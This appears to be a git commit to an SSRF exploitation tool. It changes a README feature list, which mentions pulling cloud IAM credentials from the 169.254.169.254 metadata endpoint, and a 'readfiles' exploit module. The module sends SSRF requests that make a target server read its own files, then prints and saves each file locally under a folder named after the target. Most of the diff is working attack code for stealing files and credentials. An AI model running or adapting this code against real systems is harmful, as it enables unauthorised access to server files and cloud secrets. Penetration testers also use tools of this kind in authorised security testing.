MODULE - readfile : keep a backup of the files
parent
baac471a09
commit
08333dfd01
|
@ -71,7 +71,6 @@ I <3 pull requests :)
|
|||
Feel free to add any feature listed below or a new service.
|
||||
|
||||
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
|
||||
- sockserver - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
|
||||
- handle request with file in requester
|
||||
- requester injection point in file (if param = None, check SSRFMAP in reqFile and replace with the payload)
|
||||
- add https://github.com/cujanovic/SSRF-Testing ip.py into the ip generator from core.utils
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
from core.utils import *
|
||||
import logging
|
||||
import os
|
||||
|
||||
name = "readfiles"
|
||||
description = "Read files from the target"
|
||||
|
@ -16,10 +17,22 @@ class exploit():
|
|||
if r != None:
|
||||
default = r.text
|
||||
|
||||
# Create directory to store files
|
||||
directory = requester.host
|
||||
if not os.path.exists(directory):
|
||||
os.makedirs(directory)
|
||||
|
||||
for f in self.files:
|
||||
r = requester.do_request(args.param, wrapper_file(f))
|
||||
logging.info("\033[32mReading file\033[0m : {}".format(f))
|
||||
|
||||
# Display diff between default and ssrf request
|
||||
diff = diff_text(r.text, default)
|
||||
print(diff)
|
||||
if diff != "":
|
||||
|
||||
# Display diff between default and ssrf request
|
||||
logging.info("\033[32mReading file\033[0m : {}".format(f))
|
||||
print(diff)
|
||||
|
||||
# Write diff to a file
|
||||
filename = f.replace('\\','_').replace('/','_')
|
||||
logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
|
||||
with open(directory + "/" + filename, 'w') as f:
|
||||
f.write(diff)
|
||||
|
|
Loading…
Reference in New Issue